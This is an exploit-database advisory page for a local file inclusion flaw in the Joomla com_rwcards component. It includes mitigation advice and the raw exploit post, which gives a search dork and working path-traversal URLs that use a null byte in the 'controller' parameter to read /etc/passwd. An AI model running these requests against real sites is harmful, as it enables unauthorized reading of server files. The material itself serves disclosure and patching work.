Joomla Component com_rwcards Local File Inclusion [LFI]

vendor:

Component com_rwcards

by:

altbta

7,5

CVSS

HIGH

Local File Inclusion [LFI]

CWE

Product Name: Component com_rwcards

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component com_rwcards Local File Inclusion [LFI]

A vulnerability in the Joomla Component com_rwcards allows an attacker to perform a Local File Inclusion (LFI) attack. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'controller' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with maliciously crafted 'controller' parameter. This can allow an attacker to read arbitrary files on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the Joomla Component com_rwcards.

Source

Exploit-DB raw data:

####################################################################
>>>>> Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
>>>>> Team : Sec Attack Team
>>>>> Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
>>>>> Script : Joomla Component com_rwcards
>>>>> Bug Type : Local File Inclusion [LFI]
>>>>> Dork : inurl:"com_rwcards"

####################################################################

===[ Exploit ]===

http://site/index.php?option=com_rwcards&view=rwcards&controller=[LFI]
http://site/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../etc/passwd%00

and

http://site/index.php?option=com_rwcards&controller=[LFI]
http://site/index.php?option=com_rwcards&controller=../../../../../../../../../../etc/passwd%00

####################################################################
RxH & &#1575;&#1576;&#1608; &#1593;&#1584;&#1575;&#1576;